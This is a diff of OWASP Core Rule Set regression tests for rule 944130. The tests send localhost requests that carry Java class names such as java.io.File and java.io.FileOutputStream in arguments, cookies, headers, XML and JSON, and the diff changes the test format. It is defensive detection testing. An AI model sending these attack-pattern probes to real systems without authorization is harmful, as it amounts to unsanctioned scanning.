test: java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 94 desc: "XML attribute value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 95 desc: "XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 96 desc: "Nested XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 97 desc: "Content-Type text/plain includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 98 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.File\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log: + expect_ids: [944130] + - test_id: 99 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.File\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 100 desc: "Argument test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 101 desc: "Argument name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream=test" - 
output: - log_contains: "id \"944130\"" - - test_title: 944130-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 102 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 103 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.io.FileOutputStream=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-104
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.io.FileOutputStream=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 104
 desc: "Request header test includes keyword java.io.FileOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.io.FileOutputStream
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-105
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: java.io.FileOutputStream
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 105
 desc: "XML attribute value includes keyword java.io.FileOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-106
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 106
 desc: "XML element value includes keyword java.io.FileOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FileOutputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-107
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.FileOutputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 107
 desc: "Nested XML element value includes keyword java.io.FileOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FileOutputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-108
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.FileOutputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 108
 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.FileOutputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-109
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.FileOutputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 109
 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"java.io.FileOutputStream\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-110
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"java.io.FileOutputStream\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 110
 desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"java.io.FileOutputStream\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-111
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.io.FileOutputStream\": \"test\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 111
 desc: "Argument test includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.FilterInputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-112
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.FilterInputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 112
 desc: "Argument name includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FilterInputStream=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-113
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.FilterInputStream=test"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 113
 desc: "Cookie test includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.io.FilterInputStream
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-114
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.io.FilterInputStream
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 114
 desc: "Cookie name includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.io.FilterInputStream=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-115
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.io.FilterInputStream=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 115
 desc: "Request header test includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.io.FilterInputStream
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-116
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: java.io.FilterInputStream
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 116
 desc: "XML attribute value includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-117
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 117
 desc: "XML element value includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FilterInputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-118
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.FilterInputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 118
 desc: "Nested XML element value includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.FilterInputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-119
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.FilterInputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 119
 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.FilterInputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-120
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.FilterInputStream"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 120
 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
